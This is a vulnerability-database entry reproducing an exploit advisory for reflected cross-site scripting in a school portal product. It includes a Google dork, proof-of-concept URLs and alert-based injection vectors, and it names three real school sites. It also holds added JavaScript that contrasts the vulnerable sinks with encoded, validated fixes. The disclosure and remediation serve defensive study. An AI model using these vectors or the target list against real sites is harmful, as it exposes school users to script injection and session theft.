School Website Solutions Cross Site Scripting

Vulnerability ID 1047608 Vulnerability type
Published 2012-04-24 Updated 2012-04-24
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2012040186
|Details
Vulnerability details have not yet been disclosed.
|Exploit


===============================================================
= # Exploit Title: SWS - Cross Site Scripting vulnerabilities =
= # Date: 23/04/2012                                          =   
= # Author: Phizo                                             =
= # Manufacturer: www.schoolwebsitesolutions.com              =
= # Version: Latest (Private software, no version number)     =
= # Category: webapps                                         =
= # Google dork: inurl:schools.nsw.edu.au/sws/                =
= # Tested on: Windows 7 & Ubuntu 10.04 - (Firefox 11.0)      =
===============================================================


[+] Information: SWS is a private portal software created for NSW schools only, which is why I could not gather details such as the version of the software.
Multiple XSS vulnerabilities are shown below to demonstrate the insecurity of the portal software.


[+] Details:


========
 Search  -- (Value contained within script tags)
========

# PoC: http://victim/search?search=[XSS]

# Vulnerable code: a.execute("VALUE"); -- VALUE is the raw search string from the query parameter, reflected unescaped inside a JavaScript string literal in a script block.
# Vector used: '); alert("XSS"); ('
# Output: a.execute("");alert("XSS");("");


==========
 Calendar
==========

# PoC: http://victim/calendar?p_p_col_count=3&p_p_col_id=column-1&p_p_col_pos=2&p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_mode=view&p_p_state=normal&startdate=23-3-2012">[XSS]

# Vulnerable code: (multiple hyperlinks, however I will provide one).
<a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012&print=true" target="_blank" class="printmonth">Print this page</a>

# Vector used: "><script>alert("XSS")</script>
# Output: <a href="http://victim/calendar?p_p_id=eppvanillacalendarportlet_WAR_eppvanilladefaultportlet&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&startdate=23-3-2012"><script>alert("XSS")</script>&print=true" target="_blank" class="printmonth">Print this page</a>
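Both sinks above are reflection into a context the application never encodes for: the search string lands inside a JavaScript string literal, and startdate lands inside an href attribute. The following is an added example (not code from the original advisory or from SWS) that models each sink in its vulnerable form next to a hardened form. The `a.execute` call, the calendar URL shape and the two vectors are taken from the advisory; the function names, the encoders and the date check are assumptions for illustration.

```javascript
// Added example, not part of the original advisory or of SWS.
// Templates, the 'a.execute' call and the vectors follow the advisory; the
// function names, encoders and date validation are assumed for illustration.

// Sink 1, vulnerable: the search string is dropped verbatim into a JS string
// literal inside a <script> block, so a closing quote ends the literal and
// whatever follows is executed as code.
function renderSearchVulnerable(query) {
  return `<script>a.execute("${query}");</script>`;
}

// Sink 2, vulnerable: startdate is concatenated into an href attribute, so a
// closing quote plus '>' ends the <a> tag and arbitrary markup follows.
function renderCalendarVulnerable(startdate) {
  return `<a href="http://victim/calendar?startdate=${startdate}&print=true" ` +
         `target="_blank" class="printmonth">Print this page</a>`;
}

// Encoder for the JavaScript string-literal context: everything outside a
// small safe alphabet becomes \xHH or \uHHHH, so quotes, backslashes, newlines
// and '</script>' can neither end the literal nor the script block.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9 ]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Encoder for the HTML attribute context.
function htmlAttrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened search page: same template, but the value is encoded for the
// context it is placed in (a JS string literal).
function renderSearchSafe(query) {
  return `<script>a.execute("${jsStringEncode(query)}");</script>`;
}

// Hardened calendar link: reject anything that is not shaped like d-m-yyyy,
// then URL-encode the parameter value and attribute-encode the assembled href.
// Each layer alone would already keep the payload inside the URL; together
// they also stop the injected value from reaching the link at all.
const START_DATE = /^\d{1,2}-\d{1,2}-\d{4}$/;

function renderCalendarSafe(startdate) {
  if (!START_DATE.test(startdate)) {
    throw new Error('startdate must look like d-m-yyyy');
  }
  const url = 'http://victim/calendar?startdate=' +
              encodeURIComponent(startdate) + '&print=true';
  return `<a href="${htmlAttrEncode(url)}" target="_blank" class="printmonth">Print this page</a>`;
}

// Constructed inputs: the advisory's two vectors (the search vector in the
// double-quoted form that yields the output shown above) and a benign date.
const SEARCH_VECTOR = '");alert("XSS");("';
const CALENDAR_VECTOR = '23-3-2012"><script>alert("XSS")</script>';
const BENIGN_DATE = '23-3-2012';

// Renders every variant once so the difference can be inspected side by side.
function demo() {
  let calendarSafe;
  try {
    calendarSafe = renderCalendarSafe(CALENDAR_VECTOR);
  } catch (e) {
    calendarSafe = 'rejected: ' + e.message;
  }
  return {
    searchVulnerable: renderSearchVulnerable(SEARCH_VECTOR),
    searchSafe: renderSearchSafe(SEARCH_VECTOR),
    calendarVulnerable: renderCalendarVulnerable(CALENDAR_VECTOR),
    calendarSafe,
    calendarBenign: renderCalendarSafe(BENIGN_DATE),
  };
}
```

The search fix is the important one to get right: HTML-entity encoding would not help there, because the browser does not decode entities inside a script block, so the value has to be escaped for the JavaScript literal itself. For the calendar link, encoding alone already keeps the payload inside the URL (`"` becomes `%22`, `<` becomes `%3C`); the date check is added because the parameter has a fixed shape and there is no reason to pass anything else through.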


[+] Example sites:

http://www.cook-s.schools.nsw.edu.au/
http://www.lawrenceha-s.schools.nsw.edu.au/
http://www.parameadow-s.schools.nsw.edu.au/